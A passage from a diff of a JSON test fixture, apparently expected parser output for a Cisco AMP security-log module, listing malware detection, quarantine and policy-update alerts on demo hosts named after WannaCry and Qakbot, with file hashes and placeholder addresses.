"84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:17.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204897366867971", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 646000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204901661835000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 6470, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T12:57:46.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411462918168117251", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 103000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411462922463085000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 7590, + "related.hash": [ + "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T12:57:46.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411462918168117252", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 103000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411462922463085000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 8772, + "related.hash": [ + "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T12:32:14.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.GenericKD:Gen.20fu.1201", + "cisco.amp.detection_id": "6411456342573187074", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 589000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411456342573187000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960", + "file.name": "11179468.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 11257, + "related.hash": [ + "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T12:32:14.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.12081E6CA3-95.SBX.TG", + "cisco.amp.detection_id": "6411456342573187073", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 558000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411456342573187000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837", + "file.name": "AySxs.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\Documents\\AySxs.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 12514, + "related.hash": [ + "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T12:27:42.000Z", + "cisco.amp.cloud_ioc.description": "Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.", + "cisco.amp.cloud_ioc.short_description": "W32.Qakbot.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 692000000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1492784107692000800, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 4, + "event.start": "2021-01-14T12:27:42.000Z", + "file.hash.sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae", + "file.name": "cmd.exe", + "file.path": "/C:/Windows/SysWOW64/cmd.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 13751, + "process.hash.sha256": "8063af71d08d015cc102788491c6274d3d33290b8dc41f91cc511a36fa0cba75", + "related.hash": [ + "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T12:27:23.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "df:d1:ed:2d:c8:fc" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296278, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "df:d1:ed:2d:c8:fc" + ], + "cisco.amp.timestamp_nanoseconds": 268148295, + "event.action": "Threat Detected in Low Prevalence Executable", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 1458626002840536600, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b", + "file.name": "report.pdf.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Low_Prev_Retro", + "host.name": "Demo_Low_Prev_Retro", + "input.type": "log", + "log.offset": 15508, + "related.hash": [ + "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b" + ], + "related.hosts": [ + "Demo_Low_Prev_Retro" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T12:19:10.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "04:e6:4d:d5:7a:b5" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648130, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "04:e6:4d:d5:7a:b5" + ], + "cisco.amp.timestamp_nanoseconds": 161000000, + "event.action": "Policy Update", + "event.dataset": "cisco.amp", + "event.id": 6583861114428195000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_AMP_MAP_FriedEx", + "host.name": "Demo_AMP_MAP_FriedEx", + "input.type": "log", + "log.offset": 16640, + "related.hosts": [ + "Demo_AMP_MAP_FriedEx" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T12:11:04.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "df:d1:ed:2d:c8:fc" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648173, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "df:d1:ed:2d:c8:fc" + ], + "cisco.amp.timestamp_nanoseconds": 27000000, + "event.action": "File Fetch Completed", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6264747552596296000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "file.hash.md5": "48a0bf05b9706a00d2a0ff6260412f11", + "file.hash.sha1": "5058b16a86beee96927371210b9a9f682976a50a", + "file.hash.sha256": "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b", + "file.name": "report.pdf.exe", + "file.path": "\\\\?\\C:\\Users\\rsteadman\\Downloads\\report.pdf.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Low_Prev_Retro", + "host.name": "Demo_Low_Prev_Retro", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 17570, + "related.hash": [ + "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b", + "48a0bf05b9706a00d2a0ff6260412f11", + "5058b16a86beee96927371210b9a9f682976a50a" + ], + "related.hosts": [ + "Demo_Low_Prev_Retro" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T12:02:58.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "d1:e2:b6:61:ef:7a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "Auto.A280012EEE.in10.tht.Talos", + "cisco.amp.detection_id": "6411444887895408641", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "d1:e2:b6:61:ef:7a" + ], + "cisco.amp.timestamp_nanoseconds": 756000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411444887895409000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "a659ff79ef7ffacbd61d4c2641379e44", + "file.hash.sha1": "c235e18bae63d6c4b5daadb833686f943de65a5f", + "file.hash.sha256": "a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62", + "file.name": "X4.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\Documents\\X4.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_2", + "host.name": "Demo_Qakbot_2", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 18818, + "process.hash.md5": "045451fa238a75305cc26ac982472367", + "process.hash.sha1": "2131cff0959d213cd9a5e8a8ac362d265d5b1316", + "process.hash.sha256": "9c8a1b52a638ca87a5e7e60e635a3cbf89b04f5888995f55e2ad3d94ab009b97", + "process.name": "wscript.exe", + "process.pid": 4744, + "related.hash": [ + "a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62", + "a659ff79ef7ffacbd61d4c2641379e44", + "c235e18bae63d6c4b5daadb833686f943de65a5f" + ], + "related.hosts": [ + "Demo_Qakbot_2" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:58:57.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419187549993959449", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 208000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419187549993959000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 21536, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:58:54.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419187537109057560", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 853000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419187537109058000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\Windows\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 24252, + "process.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "process.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "process.name": "mssecsvc.exe", + "process.pid": 2980, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:49:08.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "04:e6:4d:d5:7a:b5" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648130, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "04:e6:4d:d5:7a:b5" + ], + "cisco.amp.timestamp_nanoseconds": 562000000, + "event.action": "Policy Update", + "event.dataset": "cisco.amp", + "event.id": 6583853374897127000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_AMP_MAP_FriedEx", + "host.name": "Demo_AMP_MAP_FriedEx", + "input.type": "log", + "log.offset": 26979, + "related.hosts": [ + "Demo_AMP_MAP_FriedEx" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:41:12.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.event_type_id": 1107296272, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 496121997, + "event.action": "Executed malware", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 14945825043963, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "event.start": "2021-01-14T11:41:12.000Z", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 27909, + "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:41:12.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.event_type_id": 1107296258, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 498576872, + "event.action": "Multiple Infected Files", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 14945825043964, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "event.start": "2021-01-14T11:41:12.000Z", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 29220, + "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:28:46.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "d2:78:15:4a:f4:a2" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6533671595485954049", + "cisco.amp.event_type_id": 553648155, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "d2:78:15:4a:f4:a2" + ], + "cisco.amp.timestamp_nanoseconds": 440000000, + "event.action": "Retrospective Quarantine", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533671599780921000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Exploit_Prevention_Audit", + "host.name": "Demo_AMP_Exploit_Prevention_Audit", + "input.type": "log", + "log.offset": 30538, + "related.hash": [ + "fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79" + ], + "related.hosts": [ + "Demo_AMP_Exploit_Prevention_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419179222052372503", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 453000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179222052372000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 32991, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:37.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419179217757405206", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 875000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179217757405000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 35457, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:37.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + 